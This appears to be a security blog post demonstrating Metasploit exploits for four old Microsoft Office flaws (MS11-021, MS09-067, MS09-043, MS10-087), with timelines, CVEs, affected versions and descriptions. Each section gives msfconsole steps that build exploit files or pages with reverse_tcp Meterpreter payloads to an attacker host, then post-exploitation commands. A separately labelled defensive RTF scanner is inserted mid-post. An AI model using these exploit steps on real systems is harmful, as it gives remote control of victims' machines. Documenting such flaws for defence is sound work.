MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to the vendor by ZDI on 2010-10-18
Coordinated release of the vulnerability on 2011-04-12
Metasploit PoC provided on 2011-11-05

PoC provided by :

Aniway
abysssec
sinn3r
juan vazquez

Reference(s) :

CVE-2011-0105
MS11-021
ZDI-11-121

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32-bit and 64-bit editions)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine and the number of bytes to copy, therefore causing a stack-based buffer overflow. This results in arbitrary code execution in the context of the current user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo

MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Timeline :

Vulnerability reported to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB973475” provided on 2009-11-10
Metasploit PoC provided by hdm on 2010-02-12
Exploit-DB PoC provided by anonymous on 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker-supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

Commands :

use exploit/windows/fileformat/ms09_067_excel_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Timeline :

Vulnerability reported to Microsoft by ZDI on 2007-03-19
Metasploit PoC provided by hdm on 2009-07-13
Milw0rm PoC provided by anonymous on 2009-07-16
Microsoft patch “KB947319” provided on 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msdso
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-087 : Microsoft Office RTF Parsing Stack Overflow

Timeline :

Vulnerability discovered by wushi of team509
Initial vendor notification by iDefense on 2009-08-12
Initial vendor reply to iDefense on 2009-08-12
Coordinated public disclosure on 2010-11-09

PoC provided by :

wushi of team509
unknown
jduck

Reference(s) :

CVE-2010-3333
MS10-087

Affected version(s) :

Microsoft Office XP Service Pack 3 before KB2289169
Microsoft Office 2003 Service Pack 3 before KB2289187
Microsoft Office 2007 Service Pack 2 before KB2289158
Microsoft Office 2010 (32-bit editions) before KB2289161
Microsoft Office 2010 (64-bit editions) before KB2289161
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac before KB2476512
Microsoft Office for Mac 2011 before KB2454823
Open XML File Format Converter for Mac before KB2476511

Tested on Windows XP SP3 with :

Office 2003 SP3 msword.exe version 11.0.8328.0 (KB2344911 from 12 October 2010)

Description :

This module exploits a stack-based buffer overflow in the handling of the ‘pFragments’ shape property within the Microsoft Word RTF parser. All versions of Microsoft Office prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting.
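
Defender-side triage for the pFragments overflow described above, as an added example that is not part of the original post or of the Metasploit module: it parses RTF shape properties ({\sp{\sn NAME}{\sv VALUE}}) and flags any pFragments value longer than an assumed threshold. The two RTF snippets are constructed samples, not real exploit files, and the 256-character threshold is an assumption for triage.

```python
import re
import sys

# Constructed sample RTF snippets (not real exploit files): a shape with an
# ordinary property, and one whose pFragments value is implausibly long.
BENIGN_RTF = r"{\rtf1{\shp{\*\shpinst{\sp{\sn wzName}{\sv Rectangle 1}}}}}"
SUSPECT_RTF = (r"{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;"
               + "41" * 600 + "}}}}}")

# RTF encodes a shape property as {\sp{\sn NAME}{\sv VALUE}}; capture both.
SHAPE_PROP_RE = re.compile(
    r"\{\\sp\s*\{\\sn\s+([^}]*)\}\s*\{\\sv\s*([^}]*)\}", re.S)

# Triage threshold (an assumption for this example, not a value from the
# bulletin): legitimate pFragments values are short vertex-fragment lists.
MAX_PFRAGMENTS_LEN = 256


def shape_properties(rtf):
    """Return [(name, value), ...] for every shape property in the document."""
    return [(name.strip(), value) for name, value in SHAPE_PROP_RE.findall(rtf)]


def find_pfragments(rtf, max_len=MAX_PFRAGMENTS_LEN):
    """One finding per pFragments property: value length and whether it
    exceeds the triage threshold."""
    return [{"length": len(value), "flagged": len(value) > max_len}
            for name, value in shape_properties(rtf)
            if name.lower() == "pfragments"]


def is_suspicious(rtf, max_len=MAX_PFRAGMENTS_LEN):
    return any(f["flagged"] for f in find_pfragments(rtf, max_len))


def scan_file(path, max_len=MAX_PFRAGMENTS_LEN):
    """Scan an RTF file on disk; RTF is 7-bit ASCII, so latin-1 never fails."""
    with open(path, "rb") as fh:
        return is_suspicious(fh.read().decode("latin-1"), max_len)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            print(path, "SUSPICIOUS" if scan_file(path) else "clean")
    else:
        for label, doc in (("benign", BENIGN_RTF), ("suspect", SUSPECT_RTF)):
            print(label, find_pfragments(doc))
```

Run it with one or more .rtf paths to scan files, or with no arguments to see the findings for the two constructed samples.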

Commands :

use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set FILENAME test.rtf
set OUTPUTPATH /home/eromang
show targets
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig